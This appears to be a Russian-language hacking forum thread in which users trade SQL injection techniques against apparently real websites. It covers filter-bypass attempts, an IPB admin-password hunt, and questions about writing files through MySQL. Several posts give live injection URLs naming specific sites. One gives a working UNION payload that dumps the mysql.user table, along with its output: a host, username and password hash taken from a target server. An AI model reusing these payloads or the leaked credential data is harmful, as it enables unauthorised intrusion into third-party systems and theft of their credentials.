Существуют варианты обойти фильтрацию WHERE в запросе? Фильтруется, походу, тупым поиском текста в запросе. Тоесть /*!%0DWhErE*/ и подобные вариации не помогают.
Есть ли вариант обойти ORA-06502 ? character to number conversion error Реагирует так на кавычку или комментарий (--,--+ и т.д.).Часто встречал в движке такое. Реакция даже на пробелы( хз уже,что подставлять ).
Вопрос такой: Кручу, кручу скулю, получаю БД. В основном все с приставкой ipb. Ну следовательно форум ipb, ищу пароль админа... не нахожу) там где-то сотня таблиц и найти не могу( подскажите ее название пожалуйста)
Увы, тип скули - стринг. Тоесть с кавычкой. А кавычки там слэшируются. Вообще интерестная скуль. http://girsa.ru/search/'1+order+by+100+--+ http://girsa.ru/search/'%0D1%0Dorder%0Dby%0D100%0D--%0D
Осмелюсь предположить что ничего не выйдет, как я понял в скрипте не фильтруется только первый символ запроса, остальные фильтруются(?), т.е.: http://girsa.ru/search/' Получаем запрос: select gid from tags where tag = '\' or tag='\'' где красным выделено, то что нарушает синтаксис запроса, обойти это увы у меня не вышло.
Наверное, поэтому http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(mysql.user)where(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User,0x3a,Password,0x3a,File_priv))))x),3+from+mysql.user+--+ localhost:forks::Y 77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10EFC0CBD5FD:Y
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.
Приветствую. Сканил Acunetix'ом один ресурс и он выдал мне следующее: И приводит запрос, который выдает 404 и 503 ошибку. Я пытался его воспроизвести, но у меня получилась только 404 ошибка. 503-ю воспроизвести не могу. И интересует такой вопрос: насколько реально будет эксплуатировать данную уязвимость? Если вообще реально. Спасибо.
1. там mq=on. Это делает невозможным заливку, потому что железно нужны кавычки. 2. нельзя переводить в хекс методы, операторы и т.п.
реально бред это тоже значение не имеет, к бд обращается сам скрипт, уж у него права на подключение есть Melfis верно сказал Двойного запроса там тоже не видно, нужно другой способ искать, благо читалка там есть
Сейчас, специаьлно для тебя запустил apache & mysql, и специально написал php скрипт, через которй вводил комманды sql, при попытке создать файл в www выдает ошибку: Code: Can't create/write to file '/var/www/hello.txt' (Errcode: 13) И где бред?? Это естественно.